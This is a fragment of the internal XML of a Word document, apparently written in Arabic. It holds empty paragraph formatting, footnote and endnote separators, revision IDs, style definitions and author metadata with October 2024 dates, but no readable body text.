      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1273" w:rsidRDefault="005E1273" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1273" w:rsidRDefault="005E1273" w:rsidP="00781175">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005E12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DD9" w:rsidRDefault="00CA4DD9" w:rsidP="0075418C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CA4DD9" w:rsidRDefault="00CA4DD9" w:rsidP="00754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DD9" w:rsidRDefault="00CA4DD9" w:rsidP="0075418C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00CA4DD9" w:rsidRDefault="00CA4DD9" w:rsidP="007541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ADB"/>
    <w:rsid w:val="00077C71"/>
    <w:rsid w:val="00121179"/>
    <w:rsid w:val="001E6ADB"/>
    <w:rsid w:val="00337896"/>
    <w:rsid w:val="004023AE"/>
    <w:rsid w:val="00473FA1"/>
    <w:rsid w:val="004E615C"/>
    <w:rsid w:val="005424C1"/>
    <w:rsid w:val="00563E91"/>
    <w:rsid w:val="005655A6"/>
    <w:rsid w:val="005E1273"/>
    <w:rsid w:val="0075418C"/>
    <w:rsid w:val="00781175"/>
    <w:rsid w:val="007D22C1"/>
    <w:rsid w:val="00873A56"/>
    <w:rsid w:val="009C298B"/>
    <w:rsid w:val="00A137BC"/>
    <w:rsid w:val="00AC1A20"/>
    <w:rsid w:val="00BF69C5"/>
    <w:rsid w:val="00C700EC"/>
    <w:rsid w:val="00CA4DD9"/>
    <w:rsid w:val="00CD6F76"/>
    <w:rsid w:val="00D957B9"/>
    <w:rsid w:val="00E56602"/>
    <w:rsid w:val="00EA6F24"/>
    <w:rsid w:val="00EC2BA5"/>
    <w:rsid w:val="00FC72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2749F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F5D8632F-4619-4B6F-B98E-0CCFA374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BA5"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007541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18C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007541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18C"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="005424C1"/>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16</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Muhamed Elshdany</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Muhamed Elshdany</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-23T10:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-23T20:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>